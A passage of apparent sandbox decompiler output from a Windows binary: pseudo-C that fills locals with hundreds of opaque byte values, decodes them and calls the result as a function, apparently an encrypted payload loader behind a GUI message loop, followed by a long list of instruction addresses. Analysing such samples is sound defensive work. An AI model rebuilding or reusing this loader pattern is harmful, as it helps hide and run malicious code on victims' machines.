                                                                                                      				_v382 = 0xfc;
                                                                                                      				_v381 = 0x38;
                                                                                                      				_v380 = 0xd7;
                                                                                                      				_v379 = 0x82;
                                                                                                      				_v378 = 0x9f;
                                                                                                      				_v377 = 0xaa;
                                                                                                      				_v376 = 0x80;
                                                                                                      				_v375 = 0xd9;
                                                                                                      				_v374 = 0xce;
                                                                                                      				_v373 = 0x96;
                                                                                                      				_v372 = 0xf4;
                                                                                                      				_v371 = 5;
                                                                                                      				_v370 = 0x99;
                                                                                                      				_v369 = 0x86;
                                                                                                      				_v368 = 0xe5;
                                                                                                      				_v367 = 0xdd;
                                                                                                      				_v366 = 0xc7;
                                                                                                      				_v365 = 0x48;
                                                                                                      				_v364 = 0x50;
                                                                                                      				_v363 = 0x25;
                                                                                                      				_v362 = 6;
                                                                                                      				_v361 = 0xad;
                                                                                                      				_v360 = 0x84;
                                                                                                      				_v359 = 0x79;
                                                                                                      				_v358 = 0x6b;
                                                                                                      				_v357 = 0x5c;
                                                                                                      				_v356 = 0xed;
                                                                                                      				_v355 = 0x35;
                                                                                                      				_v354 = 0x6c;
                                                                                                      				_v353 = 0x8d;
                                                                                                      				_v352 = 0x27;
                                                                                                      				_v351 = 0x8b;
                                                                                                      				_v350 = 0x95;
                                                                                                      				_v349 = 0xad;
                                                                                                      				_v348 = 0x7b;
                                                                                                      				_v347 = 0xd;
                                                                                                      				_v346 = 0x17;
                                                                                                      				_v345 = 0xb4;
                                                                                                      				_v344 = 0x9c;
                                                                                                      				_v343 = 0x23;
                                                                                                      				_v342 = 0xe6;
                                                                                                      				_v341 = 0x43;
                                                                                                      				_v340 = 0x6e;
                                                                                                      				_v339 = 0x56;
                                                                                                      				_v338 = 0xfc;
                                                                                                      				_v337 = 0x2b;
                                                                                                      				_v336 = 0xe6;
                                                                                                      				_v335 = 0xea;
                                                                                                      				_v334 = 0x8f;
                                                                                                      				_v333 = 0xbf;
                                                                                                      				_v332 = 0x61;
                                                                                                      				_v331 = 0xbe;
                                                                                                      				_v330 = 0xc3;
                                                                                                      				_v329 = 0x62;
                                                                                                      				_v328 = 0xfa;
                                                                                                      				_v327 = 0x3a;
                                                                                                      				_v326 = 0x24;
                                                                                                      				_v325 = 0xb5;
                                                                                                      				_v324 = 0x4f;
                                                                                                      				_v323 = 0x5d;
                                                                                                      				_v322 = 0xa7;
                                                                                                      				_v321 = 0x26;
                                                                                                      				_v320 = 0xd3;
                                                                                                      				_v319 = 0xa3;
                                                                                                      				_v318 = 0x10;
                                                                                                      				_v317 = 0x51;
                                                                                                      				_v316 = 0x25;
                                                                                                      				_v315 = 0x4e;
                                                                                                      				_v314 = 0x2d;
                                                                                                      				_v313 = 0x31;
                                                                                                      				_v312 = 0x3b;
                                                                                                      				_v311 = 0x7d;
                                                                                                      				_v310 = 0x1e;
                                                                                                      				_v309 = 0x7b;
                                                                                                      				_v308 = 0x35;
                                                                                                      				_v307 = 0x1b;
                                                                                                      				_v306 = 7;
                                                                                                      				_v305 = 0x38;
                                                                                                      				_v304 = 0x2f;
                                                                                                      				_v303 = 0x19;
                                                                                                      				_v302 = 0xe5;
                                                                                                      				_v301 = 0xf0;
                                                                                                      				_v300 = 0x6d;
                                                                                                      				_v299 = 0xd1;
                                                                                                      				_v298 = 0xfb;
                                                                                                      				_v297 = 0x11;
                                                                                                      				_v296 = 0xe2;
                                                                                                      				_v295 = 0x35;
                                                                                                      				_v294 = 0x45;
                                                                                                      				_v293 = 0x6e;
                                                                                                      				_v292 = 0xdc;
                                                                                                      				_v291 = 0x57;
                                                                                                      				_v290 = 0x7a;
                                                                                                      				_v289 = 0x25;
                                                                                                      				_v288 = 0xb6;
                                                                                                      				_v287 = 0;
                                                                                                      				_v286 = 0x77;
                                                                                                      				_v285 = 0x61;
                                                                                                      				_v284 = 0xbc;
                                                                                                      				_v283 = 0x78;
                                                                                                      				_v282 = 0xa;
                                                                                                      				_v281 = 0x32;
                                                                                                      				_v280 = 0x32;
                                                                                                      				_v279 = 0x74;
                                                                                                      				_v278 = 0xdd;
                                                                                                      				_v277 = 0xa1;
                                                                                                      				_v276 = 0x7e;
                                                                                                      				_v275 = 2;
                                                                                                      				_v274 = 0x26;
                                                                                                      				_v273 = 0xd9;
                                                                                                      				_v272 = 0x63;
                                                                                                      				_v271 = 0x6d;
                                                                                                      				_v270 = 0x30;
                                                                                                      				_v269 = 0x25;
                                                                                                      				_v268 = 0x4e;
                                                                                                      				_v267 = 0x6c;
                                                                                                      				_v266 = 0xe5;
                                                                                                      				_v265 = 0x93;
                                                                                                      				_v264 = 0x66;
                                                                                                      				_v263 = 0x6c;
                                                                                                      				_v262 = 0xd0;
                                                                                                      				_v261 = 0x3c;
                                                                                                      				_v260 = 0xcc;
                                                                                                      				_v259 = 8;
                                                                                                      				_v258 = 0x7e;
                                                                                                      				_v257 = 0x38;
                                                                                                      				_v256 = 0xcf;
                                                                                                      				_v255 = 0x74;
                                                                                                      				_v254 = 0x2c;
                                                                                                      				_v253 = 0x68;
                                                                                                      				_v252 = 0xd1;
                                                                                                      				_v251 = 0x7d;
                                                                                                      				_v250 = 0x69;
                                                                                                      				_v249 = 0x26;
                                                                                                      				_v248 = 0xe8;
                                                                                                      				_v247 = 0x8d;
                                                                                                      				_v246 = 0x29;
                                                                                                      				_v245 = 0xd1;
                                                                                                      				_v244 = 0x88;
                                                                                                      				_v243 = 0x6a;
                                                                                                      				_v242 = 0x6d;
                                                                                                      				_v241 = 0x3f;
                                                                                                      				_v240 = 0x31;
                                                                                                      				_v239 = 0x60;
                                                                                                      				_v238 = 0x39;
                                                                                                      				_v237 = 0x77;
                                                                                                      				_v236 = 0x58;
                                                                                                      				_v235 = 0x63;
                                                                                                      				_v234 = 0x10;
                                                                                                      				_v233 = 0x24;
                                                                                                      				_v232 = 0;
                                                                                                      				_v231 = 0x1f;
                                                                                                      				_v230 = 0xc6;
                                                                                                      				_v229 = 0xb8;
                                                                                                      				_v228 = 0x2a;
                                                                                                      				_v227 = 0xe5;
                                                                                                      				_v226 = 0x40;
                                                                                                      				_v225 = 0x94;
                                                                                                      				_v224 = 0x47;
                                                                                                      				_v223 = 0x2f;
                                                                                                      				_v222 = 0x21;
                                                                                                      				_v221 = 0x6a;
                                                                                                      				_v220 = 0x2a;
                                                                                                      				_v219 = 0xe5;
                                                                                                      				_v218 = 0xe6;
                                                                                                      				_v217 = 0x23;
                                                                                                      				_v216 = 0xd7;
                                                                                                      				_v215 = 0x26;
                                                                                                      				_v214 = 0x74;
                                                                                                      				_v213 = 0x47;
                                                                                                      				_v212 = 0x1d;
                                                                                                      				_v211 = 0xe3;
                                                                                                      				_v210 = 0xaf;
                                                                                                      				_v209 = 0x30;
                                                                                                      				_v208 = 0xf4;
                                                                                                      				_v207 = 0x74;
                                                                                                      				_v206 = 0xae;
                                                                                                      				_v205 = 0x5e;
                                                                                                      				_v204 = 0x1b;
                                                                                                      				_v203 = 0x11;
                                                                                                      				_v202 = 0xaa;
                                                                                                      				_v201 = 0x85;
                                                                                                      				_v200 = 0x5d;
                                                                                                      				_v199 = 0x40;
                                                                                                      				_v198 = 0x11;
                                                                                                      				_v197 = 4;
                                                                                                      				_v196 = 0x9a;
                                                                                                      				_v195 = 0x1e;
                                                                                                      				_v194 = 0x1d;
                                                                                                      				_v193 = 0x38;
                                                                                                      				_v192 = 0xe4;
                                                                                                      				_v191 = 0x65;
                                                                                                      				_v190 = 0x11;
                                                                                                      				_v189 = 8;
                                                                                                      				_v188 = 0x6e;
                                                                                                      				_v187 = 0x7c;
                                                                                                      				_v186 = 0xd3;
                                                                                                      				_v185 = 0xf4;
                                                                                                      				_v184 = 0x51;
                                                                                                      				_v183 = 0xf3;
                                                                                                      				_v182 = 0x6f;
                                                                                                      				_v181 = 0xa6;
                                                                                                      				_v180 = 0xa4;
                                                                                                      				_v179 = 0x5f;
                                                                                                      				_v178 = 0xe7;
                                                                                                      				_v177 = 0x71;
                                                                                                      				_v176 = 0x31;
                                                                                                      				_v175 = 0x59;
                                                                                                      				_v174 = 0x4d;
                                                                                                      				_v173 = 0xef;
                                                                                                      				_v172 = 0xac;
                                                                                                      				_v171 = 0x9a;
                                                                                                      				_v170 = 0x20;
                                                                                                      				_v169 = 0x8f;
                                                                                                      				_v168 = 0x6e;
                                                                                                      				_v167 = 0x8b;
                                                                                                      				_v166 = 0x86;
                                                                                                      				_v165 = 0x11;
                                                                                                      				_v164 = 0xe5;
                                                                                                      				_v163 = 0x9d;
                                                                                                      				_v162 = 0x45;
                                                                                                      				_v161 = 0x53;
                                                                                                      				_v160 = 0xdb;
                                                                                                      				_v159 = 0x6e;
                                                                                                      				_v158 = 0xd7;
                                                                                                      				_v157 = 3;
                                                                                                      				_v156 = 0x41;
                                                                                                      				_v155 = 0x2f;
                                                                                                      				_v154 = 0xe6;
                                                                                                      				_v153 = 2;
                                                                                                      				_v152 = 0x3e;
                                                                                                      				_v151 = 0xde;
                                                                                                      				_v150 = 0x78;
                                                                                                      				_v149 = 0x4a;
                                                                                                      				_v148 = 0x2c;
                                                                                                      				_v147 = 0xc0;
                                                                                                      				_v146 = 0xb9;
                                                                                                      				_v145 = 0x26;
                                                                                                      				_v144 = 0x2a;
                                                                                                      				_v143 = 0xf5;
                                                                                                      				_v142 = 0x4a;
                                                                                                      				_v141 = 0xa7;
                                                                                                      				_v140 = 0x47;
                                                                                                      				_v139 = 0xec;
                                                                                                      				_v138 = 0xd7;
                                                                                                      				_v137 = 0x76;
                                                                                                      				_v136 = 0xc6;
                                                                                                      				_v135 = 0x70;
                                                                                                      				_v134 = 0x22;
                                                                                                      				_v133 = 0xe5;
                                                                                                      				_v132 = 0x8c;
                                                                                                      				_v131 = 0x2e;
                                                                                                      				_v130 = 0x4b;
                                                                                                      				_v129 = 0x88;
                                                                                                      				_v128 = 0x6d;
                                                                                                      				_v127 = 0xc3;
                                                                                                      				_v126 = 0x1a;
                                                                                                      				_v125 = 0x92;
                                                                                                      				_v124 = 0x75;
                                                                                                      				_v123 = 0x9d;
                                                                                                      				_v122 = 0x54;
                                                                                                      				_v121 = 0x6e;
                                                                                                      				_v120 = 0x8b;
                                                                                                      				_v119 = 0x84;
                                                                                                      				_v118 = 0x19;
                                                                                                      				_v117 = 0xa7;
                                                                                                      				_v116 = 0xbf;
                                                                                                      				_v115 = 0x49;
                                                                                                      				_v114 = 0x62;
                                                                                                      				_v113 = 0x3f;
                                                                                                      				_v112 = 0xfc;
                                                                                                      				_v111 = 0xde;
                                                                                                      				_v110 = 0xf6;
                                                                                                      				_v109 = 0x2c;
                                                                                                      				_v108 = 0x84;
                                                                                                      				_v107 = 0x2c;
                                                                                                      				_v106 = 0xc0;
                                                                                                      				_v105 = 0x22;
                                                                                                      				_v104 = 0x46;
                                                                                                      				_v103 = 4;
                                                                                                      				_v102 = 0xaf;
                                                                                                      				_v101 = 0x19;
                                                                                                      				_v100 = 0x31;
                                                                                                      				_v99 = 0x31;
                                                                                                      				_v98 = 0x90;
                                                                                                      				_v97 = 0xe0;
                                                                                                      				_v96 = 0x74;
                                                                                                      				_v95 = 0x83;
                                                                                                      				_v94 = 0xd3;
                                                                                                      				_v93 = 0x72;
                                                                                                      				_v92 = 0x13;
                                                                                                      				_v91 = 0xee;
                                                                                                      				_v90 = 0xb7;
                                                                                                      				_v89 = 0x15;
                                                                                                      				_v88 = 0x91;
                                                                                                      				_v87 = 0x98;
                                                                                                      				_v86 = 0x91;
                                                                                                      				_v85 = 0xd9;
                                                                                                      				_v84 = 0x20;
                                                                                                      				_v83 = 0x6c;
                                                                                                      				_v82 = 0x13;
                                                                                                      				_v81 = 0xa8;
                                                                                                      				_v80 = 0x42;
                                                                                                      				_v79 = 0x65;
                                                                                                      				_v78 = 0x27;
                                                                                                      				_v77 = 0x79;
                                                                                                      				_v76 = 0xe3;
                                                                                                      				_v75 = 0x50;
                                                                                                      				_v74 = 0x91;
                                                                                                      				_v73 = 0x60;
                                                                                                      				_v72 = 0x46;
                                                                                                      				_v71 = 0xd3;
                                                                                                      				_v70 = 0x29;
                                                                                                      				_v69 = 0x68;
                                                                                                      				_v68 = 0xd;
                                                                                                      				_v67 = 0x25;
                                                                                                      				_v66 = 0xf4;
                                                                                                      				_v65 = 0xae;
                                                                                                      				_v64 = 0x5e;
                                                                                                      				_v63 = 0xae;
                                                                                                      				_v62 = 0x10;
                                                                                                      				_v61 = 0x68;
                                                                                                      				_v60 = 0xad;
                                                                                                      				_v59 = 0xa6;
                                                                                                      				_v58 = 0x24;
                                                                                                      				_v57 = 0x66;
                                                                                                      				_v56 = 0xff;
                                                                                                      				_v55 = 0x22;
                                                                                                      				_v54 = 0xe6;
                                                                                                      				_v53 = 0x63;
                                                                                                      				_v52 = 0x54;
                                                                                                      				_v51 = 0x4f;
                                                                                                      				_v50 = 0x61;
                                                                                                      				_v49 = 0xbe;
                                                                                                      				_v48 = 0x6c;
                                                                                                      				_v47 = 0xe;
                                                                                                      				_v46 = 0x5b;
                                                                                                      				_v45 = 0x2c;
                                                                                                      				_v44 = 0xb7;
                                                                                                      				_v43 = 0x2a;
                                                                                                      				_v42 = 0x69;
                                                                                                      				_v41 = 0x5e;
                                                                                                      				_v40 = 0x2f;
                                                                                                      				_v39 = 0xe5;
                                                                                                      				_v38 = 0x2e;
                                                                                                      				_v37 = 0x43;
                                                                                                      				_v36 = 0x70;
                                                                                                      				_v35 = 0x18;
                                                                                                      				_v34 = 0xa6;
                                                                                                      				_v33 = 0x8a;
                                                                                                      				_v32 = 0x7c;
                                                                                                      				_v31 = 0x2f;
                                                                                                      				_v30 = 0x24;
                                                                                                      				_v29 = 0xe0;
                                                                                                      				_v2796 = 0xa2c;
                                                                                                      				_v2776 = 0;
                                                                                                      				E00007FF87FF87C119970(0x5f5e100, _v2792,  &_v2672); // executed
                                                                                                      				E00007FF87FF87C101490(_t2715, _t2715);
                                                                                                      				_v2760 = _t2715;
                                                                                                      				E00007FF87FF87C119970(0x5f5e100, _v2792,  &_v2704); // executed
                                                                                                      				E00007FF87FF87C1014B0(_t2715);
                                                                                                      				r9d = 0x5f5e100;
                                                                                                      				if ((E00007FF87FF87C119410(_t2703, __esp,  &_v2776,  &_v2800, _t2715) & 0x000000ff) != 0) goto 0x7c11924a;
                                                                                                      				_v2804 = 1;
                                                                                                      				goto 0x7c119252;
                                                                                                      				_v2804 = 0;
                                                                                                      				_v2808 = _v2804 & 0x000000ff;
                                                                                                      				E00007FF87FF87C101540( &_v2704);
                                                                                                      				E00007FF87FF87C101540( &_v2672);
                                                                                                      				_t2669 = _v2808 & 0x000000ff;
                                                                                                      				if (_t2669 == 0) goto 0x7c119382;
                                                                                                      				E00007FF87FF87C119F00();
                                                                                                      				__imp__CoInitialize();
                                                                                                      				_v2780 = _t2669;
                                                                                                      				if (_v2780 >= 0) goto 0x7c1192bb;
                                                                                                      				r9d = 0;
                                                                                                      				r8d = 0;
                                                                                                      				MessageBoxA(??, ??, ??, ??);
                                                                                                      				goto 0x7c1193ea;
                                                                                                      				r9d = 0x64;
                                                                                                      				LoadStringW(??, ??, ??, ??);
                                                                                                      				r9d = 0x64;
                                                                                                      				LoadStringW(??, ??, ??, ??);
                                                                                                      				E00007FF87FF87C113ED0(_a8);
                                                                                                      				if (E00007FF87FF87C113CB0(_a16, _a8) != 0) goto 0x7c11932d;
                                                                                                      				__imp__CoUninitialize();
                                                                                                      				goto 0x7c1193ea;
                                                                                                      				r9d = 0;
                                                                                                      				r8d = 0;
                                                                                                      				if (GetMessageW(??, ??, ??, ??) == 0) goto 0x7c119372;
                                                                                                      				if (TranslateAcceleratorW(??, ??, ??) != 0) goto 0x7c119370;
                                                                                                      				TranslateMessage(??);
                                                                                                      				DispatchMessageW(??);
                                                                                                      				goto 0x7c11932d;
                                                                                                      				__imp__CoUninitialize();
                                                                                                      				goto 0x7c1193ea;
                                                                                                      				r8d = 0x20;
                                                                                                      				E00007FF87FF87C106920(0, 0, _t2703, __esp, 0x7c17fdc0, 0x7c17a060, _t2746,  &_v2752);
                                                                                                      				_t2716 = _a8;
                                                                                                      				 *0x7c17fdc0 = _t2716;
                                                                                                      				 *0x7c17fdc8 = 1;
                                                                                                      				E00007FF87FF87C119510(_v2800, _v2776, 0x7c17a060); // executed
                                                                                                      				 *0x7c17fdd0 = _t2716;
                                                                                                      				E00007FF87FF87C119510(_v2796,  &_v2632, 0x7c17a060); // executed
                                                                                                      				_v2768 = _t2716;
                                                                                                      				_v2768();
                                                                                                      				return E00007FF87FF87C103A70(1, 0, _v2796, _v24 ^ _t2748);
                                                                                                      			}



































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































                                                                                                      0x7ff87c113fb0
                                                                                                      0x7ff87c113fb0
                                                                                                      0x7ff87c113fb0
                                                                                                      0x7ff87c113fb5
                                                                                                      0x7ff87c113fb9
                                                                                                      0x7ff87c113fc5
                                                                                                      0x7ff87c113fcc
                                                                                                      0x7ff87c113fcf
                                                                                                      0x7ff87c113fde
                                                                                                      0x7ff87c113fe7
                                                                                                      0x7ff87c113fe9
                                                                                                      0x7ff87c113fee
                                                                                                      0x7ff87c113ff6
                                                                                                      0x7ff87c113ffe
                                                                                                      0x7ff87c114007
                                                                                                      0x7ff87c114015
                                                                                                      0x7ff87c11401a
                                                                                                      0x7ff87c114025
                                                                                                      0x7ff87c114027
                                                                                                      0x7ff87c114034
                                                                                                      0x7ff87c11403e
                                                                                                      0x7ff87c114043
                                                                                                      0x7ff87c11404d
                                                                                                      0x7ff87c114057
                                                                                                      0x7ff87c114061
                                                                                                      0x7ff87c11406b
                                                                                                      0x7ff87c114075
                                                                                                      0x7ff87c11407f
                                                                                                      0x7ff87c114087
                                                                                                      0x7ff87c11408f
                                                                                                      0x7ff87c114097
                                                                                                      0x7ff87c11409f
                                                                                                      0x7ff87c1140a7
                                                                                                      0x7ff87c1140af
                                                                                                      0x7ff87c1140b7
                                                                                                      0x7ff87c1140bf
                                                                                                      0x7ff87c1140c7
                                                                                                      0x7ff87c1140cf
                                                                                                      0x7ff87c1140d7
                                                                                                      0x7ff87c1140df
                                                                                                      0x7ff87c1140e7
                                                                                                      0x7ff87c1140ef
                                                                                                      0x7ff87c1140f7
                                                                                                      0x7ff87c1140ff
                                                                                                      0x7ff87c114107
                                                                                                      0x7ff87c11410f
                                                                                                      0x7ff87c114117
                                                                                                      0x7ff87c11411f
                                                                                                      0x7ff87c114127
                                                                                                      0x7ff87c11412f
                                                                                                      0x7ff87c114137
                                                                                                      0x7ff87c11413f
                                                                                                      0x7ff87c114147
                                                                                                      0x7ff87c11414f
                                                                                                      0x7ff87c114157
                                                                                                      0x7ff87c11415f
                                                                                                      0x7ff87c114167
                                                                                                      0x7ff87c11416f
                                                                                                      0x7ff87c114177
                                                                                                      0x7ff87c11417f
                                                                                                      0x7ff87c114187
                                                                                                      0x7ff87c11418f
                                                                                                      0x7ff87c114197
                                                                                                      0x7ff87c11419f
                                                                                                      0x7ff87c1141a7
                                                                                                      0x7ff87c1141af
                                                                                                      0x7ff87c1141b7
                                                                                                      0x7ff87c1141bf
                                                                                                      0x7ff87c1141c7
                                                                                                      0x7ff87c1141cf
                                                                                                      0x7ff87c1141d7
                                                                                                      0x7ff87c1141df
                                                                                                      0x7ff87c1141e7
                                                                                                      0x7ff87c1141ef
                                                                                                      0x7ff87c1141f7
                                                                                                      0x7ff87c1141ff
                                                                                                      0x7ff87c114207
                                                                                                      0x7ff87c11420f
                                                                                                      0x7ff87c114217
                                                                                                      0x7ff87c11421f
                                                                                                      0x7ff87c114227
                                                                                                      0x7ff87c11422f
                                                                                                      0x7ff87c114237
                                                                                                      0x7ff87c11423f
                                                                                                      0x7ff87c114247
                                                                                                      0x7ff87c11424f
                                                                                                      0x7ff87c114257
                                                                                                      0x7ff87c11425f
                                                                                                      0x7ff87c114267
                                                                                                      0x7ff87c11426f
                                                                                                      0x7ff87c114277
                                                                                                      0x7ff87c11427f
                                                                                                      0x7ff87c114287
                                                                                                      0x7ff87c11428f
                                                                                                      0x7ff87c114297
                                                                                                      0x7ff87c11429f
                                                                                                      0x7ff87c1142a7
                                                                                                      0x7ff87c1142af
                                                                                                      0x7ff87c1142b7
                                                                                                      0x7ff87c1142bf
                                                                                                      0x7ff87c1142c7
                                                                                                      0x7ff87c1142cf
                                                                                                      0x7ff87c1142d7
                                                                                                      0x7ff87c1142df
                                                                                                      0x7ff87c1142e7
                                                                                                      0x7ff87c1142ef
                                                                                                      0x7ff87c1142f7
                                                                                                      0x7ff87c1142ff
                                                                                                      0x7ff87c114307
                                                                                                      0x7ff87c11430f
                                                                                                      0x7ff87c114317
                                                                                                      0x7ff87c11431f
                                                                                                      0x7ff87c114327
                                                                                                      0x7ff87c11432f
                                                                                                      0x7ff87c114337
                                                                                                      0x7ff87c11433f
                                                                                                      0x7ff87c114347
                                                                                                      0x7ff87c11434f
                                                                                                      0x7ff87c114357
                                                                                                      0x7ff87c11435f
                                                                                                      0x7ff87c114367
                                                                                                      0x7ff87c11436f
                                                                                                      0x7ff87c114377
                                                                                                      0x7ff87c11437f
                                                                                                      0x7ff87c114387
                                                                                                      0x7ff87c11438f
                                                                                                      0x7ff87c114397
                                                                                                      0x7ff87c11439f
                                                                                                      0x7ff87c1143a7
                                                                                                      0x7ff87c1143af
                                                                                                      0x7ff87c1143b7
                                                                                                      0x7ff87c1143bf
                                                                                                      0x7ff87c1143c7
                                                                                                      0x7ff87c1143cf
                                                                                                      0x7ff87c1143d7
                                                                                                      0x7ff87c1143df
                                                                                                      0x7ff87c1143e7
                                                                                                      0x7ff87c1143ef
                                                                                                      0x7ff87c1143f7
                                                                                                      0x7ff87c1143ff
                                                                                                      0x7ff87c114407
                                                                                                      0x7ff87c11440f
                                                                                                      0x7ff87c114417
                                                                                                      0x7ff87c11441f
                                                                                                      0x7ff87c114427
                                                                                                      0x7ff87c11442f
                                                                                                      0x7ff87c114437
                                                                                                      0x7ff87c11443f
                                                                                                      0x7ff87c114447
                                                                                                      0x7ff87c11444f
                                                                                                      0x7ff87c114457
                                                                                                      0x7ff87c11445f
                                                                                                      0x7ff87c114467
                                                                                                      0x7ff87c11446f
                                                                                                      0x7ff87c114477
                                                                                                      0x7ff87c11447f
                                                                                                      0x7ff87c114487
                                                                                                      0x7ff87c11448f
                                                                                                      0x7ff87c114497
                                                                                                      0x7ff87c11449f
                                                                                                      0x7ff87c1144a7
                                                                                                      0x7ff87c1144af
                                                                                                      0x7ff87c1144b7
                                                                                                      0x7ff87c1144bf
                                                                                                      0x7ff87c1144c7
                                                                                                      0x7ff87c1144cf
                                                                                                      0x7ff87c1144d7
                                                                                                      0x7ff87c1144df
                                                                                                      0x7ff87c1144e7
                                                                                                      0x7ff87c1144ef
                                                                                                      0x7ff87c1144f7
                                                                                                      0x7ff87c1144ff
                                                                                                      0x7ff87c114507
                                                                                                      0x7ff87c11450f
                                                                                                      0x7ff87c114517
                                                                                                      0x7ff87c11451f
                                                                                                      0x7ff87c114527
                                                                                                      0x7ff87c11452f
                                                                                                      0x7ff87c114537
                                                                                                      0x7ff87c11453f
                                                                                                      0x7ff87c114547
                                                                                                      0x7ff87c11454f
                                                                                                      0x7ff87c114557
                                                                                                      0x7ff87c11455f
                                                                                                      0x7ff87c114567
                                                                                                      0x7ff87c11456f
                                                                                                      0x7ff87c114577
                                                                                                      0x7ff87c11457f
                                                                                                      0x7ff87c114587
                                                                                                      0x7ff87c11458f
                                                                                                      0x7ff87c114597
                                                                                                      0x7ff87c11459f
                                                                                                      0x7ff87c1145a7
                                                                                                      0x7ff87c1145af
                                                                                                      0x7ff87c1145b7
                                                                                                      0x7ff87c1145bf
                                                                                                      0x7ff87c1145c7
                                                                                                      0x7ff87c1145cf
                                                                                                      0x7ff87c1145d7
                                                                                                      0x7ff87c1145df
                                                                                                      0x7ff87c1145e7
                                                                                                      0x7ff87c1145ef
                                                                                                      0x7ff87c1145f7
                                                                                                      0x7ff87c1145ff
                                                                                                      0x7ff87c114607
                                                                                                      0x7ff87c11460f
                                                                                                      0x7ff87c114617
                                                                                                      0x7ff87c11461f
                                                                                                      0x7ff87c114627
                                                                                                      0x7ff87c11462f
                                                                                                      0x7ff87c114637
                                                                                                      0x7ff87c11463f
                                                                                                      0x7ff87c114647
                                                                                                      0x7ff87c11464f
                                                                                                      0x7ff87c114657
                                                                                                      0x7ff87c11465f
                                                                                                      0x7ff87c114667
                                                                                                      0x7ff87c11466f
                                                                                                      0x7ff87c114677
                                                                                                      0x7ff87c11467f
                                                                                                      0x7ff87c114687
                                                                                                      0x7ff87c11468f
                                                                                                      0x7ff87c114697
                                                                                                      0x7ff87c11469f
                                                                                                      0x7ff87c1146a7
                                                                                                      0x7ff87c1146af
                                                                                                      0x7ff87c1146b7
                                                                                                      0x7ff87c1146bf
                                                                                                      0x7ff87c1146c7
                                                                                                      0x7ff87c1146cf
                                                                                                      0x7ff87c1146d7
                                                                                                      0x7ff87c1146df
                                                                                                      0x7ff87c1146e7
                                                                                                      0x7ff87c1146ef
                                                                                                      0x7ff87c1146f7
                                                                                                      0x7ff87c1146ff
                                                                                                      0x7ff87c114707
                                                                                                      0x7ff87c11470f
                                                                                                      0x7ff87c114717
                                                                                                      0x7ff87c11471f
                                                                                                      0x7ff87c114727
                                                                                                      0x7ff87c11472f
                                                                                                      0x7ff87c114737
                                                                                                      0x7ff87c11473f
                                                                                                      0x7ff87c114747
                                                                                                      0x7ff87c11474f
                                                                                                      0x7ff87c114757
                                                                                                      0x7ff87c11475f
                                                                                                      0x7ff87c114767
                                                                                                      0x7ff87c11476f
                                                                                                      0x7ff87c114777
                                                                                                      0x7ff87c11477f
                                                                                                      0x7ff87c114787
                                                                                                      0x7ff87c11478f
                                                                                                      0x7ff87c114797
                                                                                                      0x7ff87c11479f
                                                                                                      0x7ff87c1147a7
                                                                                                      0x7ff87c1147af
                                                                                                      0x7ff87c1147b7
                                                                                                      0x7ff87c1147bf
                                                                                                      0x7ff87c1147c7
                                                                                                      0x7ff87c1147cf
                                                                                                      0x7ff87c1147d7
                                                                                                      0x7ff87c1147df
                                                                                                      0x7ff87c1147e7
                                                                                                      0x7ff87c1147ef
                                                                                                      0x7ff87c1147f7
                                                                                                      0x7ff87c1147ff
                                                                                                      0x7ff87c114807
                                                                                                      0x7ff87c11480f
                                                                                                      0x7ff87c114817
                                                                                                      0x7ff87c11481f
                                                                                                      0x7ff87c114827
                                                                                                      0x7ff87c11482f
                                                                                                      0x7ff87c114837
                                                                                                      0x7ff87c11483f
                                                                                                      0x7ff87c114847
                                                                                                      0x7ff87c11484f
                                                                                                      0x7ff87c114857
                                                                                                      0x7ff87c11485f
                                                                                                      0x7ff87c114867
                                                                                                      0x7ff87c11486f
                                                                                                      0x7ff87c114877
                                                                                                      0x7ff87c11487f
                                                                                                      0x7ff87c114887
                                                                                                      0x7ff87c11488f
                                                                                                      0x7ff87c114897
                                                                                                      0x7ff87c11489f
                                                                                                      0x7ff87c1148a7
                                                                                                      0x7ff87c1148af
                                                                                                      0x7ff87c1148b7
                                                                                                      0x7ff87c1148bf
                                                                                                      0x7ff87c1148c7
                                                                                                      0x7ff87c1148cf
                                                                                                      0x7ff87c1148d7
                                                                                                      0x7ff87c1148df
                                                                                                      0x7ff87c1148e7
                                                                                                      0x7ff87c1148ef
                                                                                                      0x7ff87c1148f7
                                                                                                      0x7ff87c1148ff
                                                                                                      0x7ff87c114907
                                                                                                      0x7ff87c11490f
                                                                                                      0x7ff87c114917
                                                                                                      0x7ff87c11491f
                                                                                                      0x7ff87c114927
                                                                                                      0x7ff87c11492f
                                                                                                      0x7ff87c114937
                                                                                                      0x7ff87c11493f
                                                                                                      0x7ff87c114947
                                                                                                      0x7ff87c11494f
                                                                                                      0x7ff87c114957
                                                                                                      0x7ff87c11495f
                                                                                                      0x7ff87c114967
                                                                                                      0x7ff87c11496f
                                                                                                      0x7ff87c114977
                                                                                                      0x7ff87c11497f
                                                                                                      0x7ff87c114987
                                                                                                      0x7ff87c11498f
                                                                                                      0x7ff87c114997
                                                                                                      0x7ff87c11499f
                                                                                                      0x7ff87c1149a7
                                                                                                      0x7ff87c1149af
                                                                                                      0x7ff87c1149b7
                                                                                                      0x7ff87c1149bf
                                                                                                      0x7ff87c1149c7
                                                                                                      0x7ff87c1149cf
                                                                                                      0x7ff87c1149d7
                                                                                                      0x7ff87c1149df
                                                                                                      0x7ff87c1149e7
                                                                                                      0x7ff87c1149ef
                                                                                                      0x7ff87c1149f7
                                                                                                      0x7ff87c1149ff
                                                                                                      0x7ff87c114a07
                                                                                                      0x7ff87c114a0f
                                                                                                      0x7ff87c114a17
                                                                                                      0x7ff87c114a1f
                                                                                                      0x7ff87c114a27
                                                                                                      0x7ff87c114a2f
                                                                                                      0x7ff87c114a37
                                                                                                      0x7ff87c114a3f
                                                                                                      0x7ff87c114a47
                                                                                                      0x7ff87c114a4f
                                                                                                      0x7ff87c114a57
                                                                                                      0x7ff87c114a5f
                                                                                                      0x7ff87c114a67
                                                                                                      0x7ff87c114a6f
                                                                                                      0x7ff87c114a77
                                                                                                      0x7ff87c114a7f
                                                                                                      0x7ff87c114a87
                                                                                                      0x7ff87c114a8f
                                                                                                      0x7ff87c114a97
                                                                                                      0x7ff87c114a9f
                                                                                                      0x7ff87c114aa7
                                                                                                      0x7ff87c114aaf
                                                                                                      0x7ff87c114ab7
                                                                                                      0x7ff87c114abf
                                                                                                      0x7ff87c114ac7
                                                                                                      0x7ff87c114acf
                                                                                                      0x7ff87c114ad7
                                                                                                      0x7ff87c114adf
                                                                                                      0x7ff87c114ae7
                                                                                                      0x7ff87c114aef
